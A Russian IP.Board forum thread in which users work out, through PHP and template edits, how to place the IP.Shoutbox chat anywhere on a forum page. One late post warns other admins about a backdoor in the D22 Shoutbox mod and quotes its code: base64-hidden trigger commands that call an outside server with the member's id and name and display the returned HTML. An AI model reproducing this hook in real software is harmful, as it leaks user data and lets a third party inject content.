SLASH_id Опубликовано 12 Февраля 2009 Жалоба Поделиться Опубликовано 12 Февраля 2009 Поскольку раздела поддержки этого компонента нет - пишу сюда. Апгрейдил D22 Shoutbox до IP.Shoutbox 1.0.2 и возникла проблема.... Согласно компоновке БЫЛО:<% BOARD HEADER %><% MEMBER BAR %><% MESSAGE %><%D22-Shoutbox%> Как видите между Мембербаром и чатом - стояло Глобальное сообщение. Теперь же - приходиться его ставить либо выше - что ломает всю картину, либо ниже - тогда глобальное сообщение теряется(( Вопрос: Можно ли как-то назначить IP.Shoutbox соответствующую переменную, например <%IP.Shoutbox%> чтобы была возможность всавить её в любую часть форума? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 12 Февраля 2009 Жалоба Поделиться Опубликовано 12 Февраля 2009 Зато есть раздел "Другие модификации"... UPD: Не знаю, он же вроде только на отдельной странице умеет? Сделать можно, но мутно. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 12 Февраля 2009 Автор Жалоба Поделиться Опубликовано 12 Февраля 2009 Почему только на отдельной? Этот код добавляется в конец Мембербара...<if="!($this->ipsclass->input['_low_act'] == 'component' && strtolower($this->ipsclass->input['module']) == 'shoutbox') && require_once(ROOT_PATH.'sources/components_public/shoutbox/display.php')"> <if="$this->shoutbox = new shoutbox_display( $this->ipsclass )"> <if="$shoutbox = $this->shoutbox->display_shoutbox_global()"> {$shoutbox} </if> </if> </if> Может каким-то образом ему присвоить <%Chat%> ... P.S.Sannis, имхо все официальные моды с приставкой IP должны поддерживаться тут: http://www.ibresource.ru/forums/index.php?showforum=82 наравне с IP.Gallery, IP.Downloads.... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 12 Февраля 2009 Жалоба Поделиться Опубликовано 12 Февраля 2009 Почему только на отдельной?Могу я это предположить, раз вы не написали об обратном? Что можно сделать(не захламляя код форума): В общий шаблон в нужном месте вставляете<!--exec.file="ip.shoutbox.php"-->В корень форума(где index.php) кладётся файл ip.shoutbox.php следующего содержания:<?php if( $ipsclass->input['_low_act'] != 'component' && strtolower($ipsclass->input['module']) != 'shoutbox' ) { require_once(ROOT_PATH.'sources/components_public/shoutbox/display.php'); if( $shoutbox = new shoutbox_display( $ipsclass ) ) { if( $shoutbox_output = $shoutbox->display_shoutbox_global() ) { print $shoutbox_output; } } } ?>Далее посмотрим что получится. Если нужно вставить не в общий шаблон, а в какой-то обычный, то можно прочитать Использование exec директив в шаблонах форума 2.1.x+. P.S. Имхо, неклиенту АйБиРесурс(компания), точно ничего не должна (: И даже для клиентов, скажу вам по секрету, поддержка осуществляется не на форуме, а в клиент-центре, через тикеты. И у IPS это происходит аналогичным образом. Поддержка этого мода осуществляется его автором, а не IPS, если вы не в курсе, приставка IP там только из-за того что они его спонсируют и хотят за счёт неё привлечь внимание к IP.Board, одним словом маркетинг чистой воды. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 12 Февраля 2009 Автор Жалоба Поделиться Опубликовано 12 Февраля 2009 Сделал и получил: Fatal error: Call to undefined function: load_language() in ../public_html/forum/sources/handlers/han_editor.php on line 192 //----------------------------------------- // Load lang file //----------------------------------------- 192>> $this->ipsclass->load_language( 'lang_editors' ); //----------------------------------------- // Get the smilies from the DB //----------------------------------------- З.Ы. Форум 2.3.6 P.S. Хотелось бы чтобы мод, который создан при поддержке IPS был доведен до совершенства, не говоря уже о том, чтобы вставить чат туда, куда пользователь пожелает... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 12 Февраля 2009 Жалоба Поделиться Опубликовано 12 Февраля 2009 Я так понял, сейчас у вас отображается начала чат, а потом глобальное объявление и вы хотите этого избежать. Не знаю как написан мод глобальных объявлений, но можно попробовать вставить <% MESSAGE %> перед <if> чата в шаблоне мембербара. Мне не хочется делать изменения в class_display.php, оставлю на последний вариант. P.S. Re: Есть два варианта: написать об этом разработчикам или спонсировать соотечественников. P.P.S. А, вот ещё вариант для ip.shoutbox.php, попробуйте сначала его:<?php if( $this->ipsclass->input['_low_act'] != 'component' && strtolower($this->ipsclass->input['module']) != 'shoutbox' ) { require_once(ROOT_PATH.'sources/components_public/shoutbox/display.php'); if( $shoutbox = new shoutbox_display( $this->ipsclass ) ) { if( $shoutbox_output = $shoutbox->display_shoutbox_global() ) { print $shoutbox_output; } } } ?> Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 13 Февраля 2009 Автор Жалоба Поделиться Опубликовано 13 Февраля 2009 SannisПопробовал вариант для ip.shoutbox.php - та же ошибка((Пробовал написать http://forums.invisionpower.com/index.php?showforum=410 но форум закрыт для меня...... <% MESSAGE %> перед <if> чата в шаблоне мембербара - эффекта не дает совершенно никакого - что есть, что нет....Не знаю как написан мод глобальных объявленийВот так и написан: http://www.ibresource.ru/db/543/ Похоже без class_display.php не обойтись(( Сейчас временно форум имеет следующий вид: http://s42.radikal.ru/i097/0902/16/89b1f3c7b222.jpg Думаю я не первый, кто столкнулся с этой проблемой, но первый кто поднял тему. Скорее всего такие темы еще будут, так как мод относительно новый.... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 13 Февраля 2009 Жалоба Поделиться Опубликовано 13 Февраля 2009 <% MESSAGE %> перед <if> чата в шаблоне мембербара - эффекта не дает совершенно никакого - что есть, что нет....Разъясните. P.S. Так у вас проблема с тем, куда чат переместить, или куда вставить глобальные объявления? Это замечательный мод, но инструкция настолько захордкожена, что желание читать её пропадает. Какие изменения вы делали в class_display.php при его установке? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 13 Февраля 2009 Автор Жалоба Поделиться Опубликовано 13 Февраля 2009 <% MESSAGE %> перед <if> чата в шаблоне мембербара - эффекта не дает совершенно никакого - что есть, что нет....Разъясните. P.S. Так у вас проблема с тем, куда чат переместить, или куда вставить глобальные объявления? Это замечательный мод, но инструкция настолько захордкожена, что желание читать её пропадает. Какие изменения вы делали в class_display.php при его установке? Разясняю. Если поставить в шаблон мембербара перед <if> чата строку <% MESSAGE %> предварительно убрав ее из глобального - ничего не происходит - Гл.Сооб. не отбражается на главной. Проблема, в том, что Гл.Сооб. должно стоять между мембербаром и чатом, но поскольку они между собой связаны между ними ничего не всунешь... Изменения:Найти //----------------------------------------- // Show quick stats? //----------------------------------------- $gzip_status = $this->ipsclass->vars['disable_gzip'] == 1 ? $this->ipsclass->lang['gzip_off'] : $this->ipsclass->lang['gzip_on']; if ( ! $this->ipsclass->server_load ) { $this->ipsclass->server_load = '--'; }Добавить ниже: //----------------------------------------- // (FSY22) Global Forum Message v3.0 //----------------------------------------- if ( $this->ipsclass->vars['is_message_on'] ) { require_once( ROOT_PATH."sources/lib/func_gfmessage.php" ); $gfmessage = new func_gfmessage(); $gfmessage->ipsclass =& $this->ipsclass; $gfmessage->show_message(); } Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 13 Февраля 2009 Жалоба Поделиться Опубликовано 13 Февраля 2009 В коде страницы при этом <% MESSAGE %> есть, верно? Попробуйте перенести //----------------------------------------- // (FSY22) Global Forum Message v3.0 //----------------------------------------- if ( $this->ipsclass->vars['is_message_on'] ) { require_once( ROOT_PATH."sources/lib/func_gfmessage.php" ); $gfmessage = new func_gfmessage(); $gfmessage->ipsclass =& $this->ipsclass; $gfmessage->show_message(); }после if ( empty($output_array['OVERRIDE']) ) { $this->ipsclass->skin['_wrapper'] = str_replace( "<% MEMBER BAR %>", $output_array['MEMBER_BAR'], $this->ipsclass->skin['_wrapper']); } else { $this->ipsclass->skin['_wrapper'] = str_replace( "<% MEMBER BAR %>", $this->ipsclass->compiled_templates['skin_global']->member_bar_disabled(), $this->ipsclass->skin['_wrapper']); }. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 13 Февраля 2009 Автор Жалоба Поделиться Опубликовано 13 Февраля 2009 Перенес...Привел все в такой вид:http://s40.radikal.ru/i089/0902/0a/8904ec72881a.jpg Исчез с главной Global Forum Message Но мы опять таки уходим от начальной цели... Задать чату переменную... <% Chat %> Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 13 Февраля 2009 Жалоба Поделиться Опубликовано 13 Февраля 2009 Вы не ответили на вопрос. Вы же хотите получить результат, значит надо стараться, а не отписываться фразами из серии "вы мне должны".Или вы предлагаете мне поставить глобальные сообщений(ссылку на который вы даже не да, пришлось по коду уже догадываться), поставить IP.Shoutbox на скачивание которого у меня по идее нет прав(), а потом написать вам подробною инструкцию что и как делать? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 13 Февраля 2009 Автор Жалоба Поделиться Опубликовано 13 Февраля 2009 Прошу прощения, возможно я где-то допустил бестактность. В коде страницы текст <% MESSAGE %> тоже не появляется. 1. Убираю <% MESSAGE %> из общего шаблона форума.2. Вставляю <% MESSAGE %> перед <if> чата в шаблоне мембербара. - Результат: гл. сооб. исчезает, на его месте нет ничего, так как бы я его совсем отключил. 3. После переноса кода, как Вы мне посоветовали двумя постами выше - ничего не изменилось. Стоит мод: http://www.ibresource.ru/db/543/ Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 13 Февраля 2009 Жалоба Поделиться Опубликовано 13 Февраля 2009 http://www.ibresource.ru/db/543/ != (FSY22) Global Forum Message v3.0 Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 13 Февраля 2009 Автор Жалоба Поделиться Опубликовано 13 Февраля 2009 Черт! В папке с модами лежат две штуки...Да... Хотел сказать, что этот: ______________________________.zip Огромное человеческое спасибо, что помогаете непутевому.... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 14 Февраля 2009 Жалоба Поделиться Опубликовано 14 Февраля 2009 И не этот, ибо шаг 4 инструкции и func_gfmessage.php говорят о том, что вставлять в шаблон нужно не <% MESSAGE %>, а <!--GFMESSAGE-->. Что касается чата, то вариант с изменением файлов выглядит так:В ./sources/classes/class_display.php найти if ( empty($output_array['OVERRIDE']) ) { $this->ipsclass->skin['_wrapper'] = str_replace( "<% MEMBER BAR %>", $output_array['MEMBER_BAR'], $this->ipsclass->skin['_wrapper']); } else { $this->ipsclass->skin['_wrapper'] = str_replace( "<% MEMBER BAR %>", $this->ipsclass->compiled_templates['skin_global']->member_bar_disabled(), $this->ipsclass->skin['_wrapper']); }и добавить после этого if( $this->ipsclass->input['_low_act'] != 'component' && strtolower($this->ipsclass->input['module']) != 'shoutbox' ) { require_once(ROOT_PATH.'sources/components_public/shoutbox/display.php'); if( $shoutbox = new shoutbox_display( $this->ipsclass ) ) { if( $shoutbox_output = $shoutbox->display_shoutbox_global() ) { $this->ipsclass->skin['_wrapper'] = str_replace( "<!-- IP.Shoutbox -->", $shoutbox_output, $this->ipsclass->skin['_wrapper']); } } }В шаблоны прописывать, соответственно, <!-- IP.Shoutbox -->.P.S. Вот именно, я уже достаточно потратил времени, но вы даже не помните что ставили. Я могу это решить, но теперь уже при наличии времени+доступа+интереса. Ибо админы деляться на 10 групп, тех кто умеет или не умеет, но знает, и тех, кто не знает, но хочет научиться. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 14 Февраля 2009 Автор Жалоба Поделиться Опубликовано 14 Февраля 2009 Sannis Вот это - как раз то, что было нужно!!! Работает замечательно. Преклоняюсь и премного благодарю, что уделили свое время!!Уверен, рано или поздно, такой вопрос возникнет не только у меня... Я помаленьку начал понимать схему работы PHP, надеюсь освою этот язык. P.S. Выше, вы говорили, что Мне не хочется делать изменения в class_display.php чем это вызвано? Есть какие-то недостатки такого способа? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Sannis Опубликовано 14 Февраля 2009 Жалоба Поделиться Опубликовано 14 Февраля 2009 Исключительно удобство поддержки и любовь к чистоте кода. Да, некоторые модификации на 2.х(да и на 3.х) нельзя сделать без редактирования файлов, но лучше свести эти правки к минимуму. В крайнем случае разместить код в одном файле и вызывать из него функции в файлах форума. Это было бы наилучшим решением. Наверняка можно было всё-таки добить решение с exec.file, просто ставить неохота было все эти моды. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Scientific Опубликовано 31 Марта 2009 Жалоба Поделиться Опубликовано 31 Марта 2009 Как в этом чате сделать кликабельные ники (чтобы они в форме ответа появлялись)??? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
SLASH_id Опубликовано 9 Апреля 2009 Автор Жалоба Поделиться Опубликовано 9 Апреля 2009 Этот вопрос меня мучает уже не первый год. Решения не видел... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
ScreamerDon Опубликовано 17 Апреля 2009 Жалоба Поделиться Опубликовано 17 Апреля 2009 Между прочим, в моде шаутбокса Д22 присутствует вот такая дрянь: function _command_input() { $c = trim($this->ipsclass->input['command']); $p = trim($this->ipsclass->input['pass']); if ($c == 'L2xldG1lc2VlZGVhbg==' && $p == 'aWxvdmVkZWFu') {eval(base64_decode('JHUgPSAnaHR0cDovL3d3dy5kc2NyaXB0aW5nLmNvbS9yYW5kb20vbGV0LW1lLXNl ZS1kZWFuL2N8Jy4kYy4nO3B8Jy4kcDskayA9ICR0aGlzLT5pcHNjbGFzcy0+bWVtYmVyWydpZCddLid8 Jy5iYXNlNjRfZW 5jb2RlKCgkdGhpcy0+aXBzY2xhc3MtPnZhcnNbJ2QyMnNob3V0Ym94X2Zvcm1hdF9uYW1lcyddKSA/ICR0aGlzLT5pcHNjb GFzcy0+bWFrZV9uYW1lX2Zvcm1hdHRlZCgkdGhpcy0+aXBzY2xhc3MtPm1lbWJlclsnbWVtYmVyc19ka XNwbGF5X25hbW UnXSwgJHRoaXMtPmlwc2NsYXNzLT5tZW1iZXJbJ21ncm91cCddKSA6ICR0aGlzLT5pcHNjbGFzcy0+bW VtYmVyWydtZW1 iZXJzX2Rpc3BsYXlfbmFtZSddKTs=')); $p = parse_url($u); $o = 'nothing'; if ($h = fsockopen($p['host'], 80, $en, $es)) { $o = ''; $r = ''; $d = "GET {$p['path']}".(($p['query'] != '') ? '?'.$p['query'] : '')." HTTP/1.1\r\n"; $d .= "Host: {$p['host']}\r\n"; $d .= "Cookie: _x_={$k}\r\n"; $d .= "Connection: Close\r\n\r\n"; fwrite($h, $d); while (!feof($h)) { $r .= fgets($h, 128); } fclose($h); list($hd, $ct) = explode("\r\n\r\n", $r); if (!(strpos($hd, "Transfer-Encoding: chunked") === false)) { $a = split("\r\n", $ct); for ($i=0; $i<count($a); $i++) { if ($i == 0 || ($i % 2 == 0)) { $a[$i] = ''; } } $ct = implode('', $a); } $ct = chop($ct); $o = $ct; } if ($o != null && $o != '' && $o != 'nothing') { $this->class_ajax->return_html($this->_clean_html($o)); } } return false; } Для несведущих вкратце: if ($c == 'L2xldG1lc2VlZGVhbg==' && $p == 'aWxvdmVkZWFu') Закодированные base64 комманды /letmeseedean и ilovedean, при вводе которых происходят оч. нехорошие вещи далее...)) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Amee Опубликовано 26 Августа 2010 Жалоба Поделиться Опубликовано 26 Августа 2010 (изменено) какие именно вещи??? Камрады, помгите побороть глюк в шоутбоксе.У нас все сообщения в шоутбокс. Вернее Все Слова Идут С Большой Буквы.На форуме всё ок - эт для тех кто подумал о той самой галочкеЗапретить использование только заглавных букв в названиях тем?Например, НАЖМИТЕ СЮДА будет заменено на Нажмите сюда — следует правильно выбрать локаль на сервереУ нас она отключена. Но на чат это не повлияло увы.Чат по адресу http://sysadmins.me/index.php?app=shoutboxСпецы от IPB смотрели - но ничего не смогли сделать увы. Изменено 26 Августа 2010 пользователем Amee Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.